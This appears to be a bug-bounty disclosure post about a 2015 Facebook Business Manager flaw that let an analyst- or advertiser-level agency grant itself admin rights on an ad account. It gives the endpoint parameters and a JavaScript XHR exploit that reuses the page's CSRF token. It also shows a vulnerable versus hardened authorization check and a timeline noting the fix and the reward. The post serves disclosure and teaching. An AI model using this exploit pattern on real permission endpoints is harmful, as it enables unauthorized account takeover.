Bypass ad account roles vulnerability 2015
I discovered a vulnerability in Facebook that allowed a normal user of an ad account to gain unauthorized admin access to that ad account.
Admins of an ad account can add any user to the ad account with one of these three roles:
- admin
- advertiser
- analyst
Facebook launched Business Manager in 2014 to help businesses and agencies manage their Facebook Pages; it is accessible at business.facebook.com.
In Business Manager, a business account can assign agencies to its own ad accounts, so that those agencies get limited access to the ad accounts (the owner sets this access level during the assign-agency process).
The vulnerability I found allows an agency with a normal role (advertiser or analyst) to change its own access to admin.
Scenario:
I have a business account and I give analyst permission to another business account to work on my ad account.
That business account can bypass the roles and get admin access.
Details:
With only analyst permission in any ad account, send this request:
Request URL: facebook.com/ads/manage/settings/permissions/?action=add_user
Request body:
act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission: 1001 admin, 1002 advertiser, 1003 analyst]
Exploit:
var Xhr;
Xhr = new XMLHttpRequest();
Xhr.open("POST", "/ads/manage/settings/permissions/?action=add_user", true);
// the body is form-encoded, so declare it as such
Xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
// fb_dtsg is Facebook's CSRF token, read from the current page (the original was missing the "&" separator here)
p += "&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value;
Xhr.send(p);
__ACCID__ = ad account id
__USERID__ = the user who will become the new admin ;)
__PERM__ = permission (1001, 1002 or 1003)
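The root cause described above is a server-side authorization check that only confirmed the caller belonged to the ad account, not that the caller held the admin role. The following is an added example (not Facebook's code) of that broken check beside a corrected one; the role codes 1001/1002/1003 come from the post, while the handler names, the in-memory store and the sample accounts are assumptions for illustration.

```javascript
// Role codes as given in the post.
const ROLE = { ADMIN: 1001, ADVERTISER: 1002, ANALYST: 1003 };

// Constructed sample data: ad account "act_1" with its owner as admin and
// an agency user that was only granted analyst access.
function makeStore() {
  return new Map([
    ["act_1", new Map([["owner", ROLE.ADMIN], ["agency", ROLE.ANALYST]])],
  ]);
}

// Vulnerable variant: only checks that the caller has *some* role in the
// account, so an analyst can grant anyone (including itself) admin.
function addUserVulnerable(store, callerId, { act, user_id, add_user_permission }) {
  const members = store.get(act);
  if (!members || !members.has(callerId)) return { ok: false, error: "not_a_member" };
  members.set(user_id, add_user_permission);
  return { ok: true };
}

// Hardened variant: the caller's role is read from server-side state, never
// from the request; only admins may add or change members, and the requested
// role must be one of the known codes (request values are assumed already
// parsed to numbers).
function addUserHardened(store, callerId, { act, user_id, add_user_permission }) {
  const members = store.get(act);
  if (!members) return { ok: false, error: "no_such_account" };
  if (members.get(callerId) !== ROLE.ADMIN) return { ok: false, error: "forbidden" };
  if (!Object.values(ROLE).includes(add_user_permission)) return { ok: false, error: "bad_permission" };
  members.set(user_id, add_user_permission);
  return { ok: true };
}

function roleOf(store, act, userId) {
  return store.get(act).get(userId);
}

// Replays the post's scenario against a handler: the analyst-level agency
// user submits add_user for itself with the admin code, and we report the
// handler's answer plus the role it actually ends up with.
function demo(handler) {
  const store = makeStore();
  const res = handler(store, "agency", { act: "act_1", user_id: "agency", add_user_permission: ROLE.ADMIN });
  return { ...res, role: roleOf(store, "act_1", "agency") };
}
```

With the vulnerable handler the agency ends up as 1001 (admin); with the hardened one the request is refused and it stays 1003.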
POC:
I removed some sections that contained a user id or email.
Timeline:
- Mar 14, 2015 01:27am: Initial report
- Mar 17, 2015 03:35am: Bug acknowledged by the security team
- Mar 17, 2015 08:00am: Security team member Reginaldo informed me that the vulnerability was fixed
- Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with $8000.
great find